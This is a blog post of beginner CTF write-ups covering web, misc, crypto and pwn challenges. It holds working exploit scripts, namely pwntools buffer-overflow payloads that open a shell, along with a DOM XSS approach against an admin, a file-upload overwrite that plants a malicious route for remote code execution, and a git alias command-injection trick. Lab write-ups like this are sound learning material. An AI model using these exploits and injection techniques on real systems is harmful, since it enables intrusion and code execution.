Tritium

Tritium

HomeArchives

I am still a newbie

#CTF!73
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This is a CTF challenge with various categories such as web, misc, crypto, and pwn. Participants need to find vulnerabilities in different scenarios to gain control or access sensitive information. The challenge includes tasks like exploiting DOM XSS, uploading malicious files to achieve remote code execution, and solving cryptographic puzzles. Participants also need to analyze and exploit vulnerabilities in code snippets provided in the challenge.

Write interesting write-ups for the newbie CTF challenges.

web#

babyjvav#

https://www.tritium.work/2023/11/06/Java Pitfalls for Beginners/

secchat#

image

There is a DOM XSS vulnerability here that inserts innerHTML. It can be triggered using the svg tag or the onerror attribute of the img tag.

Note that when initiating a chat, the id calls the message function. So, construct an XSS payload in the id and send it to the admin. This will allow you to control the admin's behavior through various function calls.

I want to score 500 in the snow#

...I think this challenge is quite simple.

daxue =new Proxy({
        "math": "150",
        "computer": new String("150"),
        "politics": 98,
        "english": 100,
        "flag": 0,
        value:500

    }, {
        get:function (target, prop, receiver) {
            if (prop === 'politics') {
                if (target.politics !== 100) {
                    return target.politics++;
                } else {
                    return target.politics;
                }
            };
            if(prop === "valueOf"){
                return function() {
                    return target.value;
                };
            };
            if (prop === 'english') {
                if (target.english !== 100){
                    return "99";
                }else {
                    return target.english++;
                }
            };
            return Reflect.get(target, prop,receiver);
        }
    });

My new flask#

Override /src/app.py by uploading any file and add a malicious route. This will allow remote code execution (RCE).

image

misc#

Snow Tree Saw Structure#

This challenge involves using gitshell, which is a rarely used feature.

git -c alias.test='!/readflag' test

Use alias to introduce an external command.

Memory Forensics#

Use vol to view processes, dump backdoor.exe, and read it.

What was before 3G#

I wanted to test information theory, but there must be a twist in the CTF environment.

while True:
    r = remote("172.20.14.117",53001)
    for i in range(15):
        print(r.recvuntil(b"Ask Shannon:\n[-] "))
        r.sendline(b"1")
    r.recvuntil(b"Now open the chests:\n[-] ")
    r.sendline(b'1 1 1 1 1 1 1')
    res = r.recvline().decode()
    if "You've found all the treas" in res:
        print(res)
        break
    else:
        print("next")
        r.close()
        continue

There are only 128 possible cases, so it will quickly result in all 1s.

crypto#

hard_pow#

I couldn't understand the hashpumpy length extension attack, so I used a simple substitution.

https://github.com/shellfeel/hash-ext-attack/tree/master

easy_pow#

Just run brutehash to solve it, no need for a script.

easy_dhke#

Everything has been leaked, so just steal it and sew it into pwntools.

from Crypto.Util.number import *  # type: ignore
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad

import string
import random
import os
from pwn import *

# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
p = 327824197795087630552811243153730025469
# g is the base used for generating public keys in the Diffie-Hellman key exchange
g = 5
# alice is Alice's private key, an integer chosen by Alice
alice = 22751
# bob is Bob's private key, an integer chosen by Bob
bob = 39494
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
Bob = pow(g, bob, p)
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
key = long_to_bytes(pow(Bob, alice, p))


def encrypt(plain_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
    return cipher_text


def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
    return plain_text


r = remote('172.20.14.117',40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa',key))
print(r.recvall())

easy_rsa#

The value of n in this challenge is very simple. Just factor it using factordb and decrypt it.

leak_d#

Since you already know d, you can decrypt it directly.

I seem to have deleted the script.

pwn#

right#

I figured this out myself. It's the simplest ret2text from ctfwiki.

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
r = remote("172.20.14.117",28202)
addr = 0x40115A
payload = flat([b'a'*0x28,addr])
r.recvuntil(b'so please tell me what you want to tell me\n')
# print(payload)
r.sendline(payload)
# r.sendline(b'ls')
r.interactive()
# print(r.recvline())

addr is the address of the system line, and rbp-20h+8 overwrites the stack top.

onepiece#

from pwn import *

io=remote("172.20.14.117",61768)
addr = 0x40119e
payload=b"a"*0x100+p64(addr)*0x100
io.sendline(payload)
io.interactive()

I randomly came up with this. I couldn't understand blindpwn.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.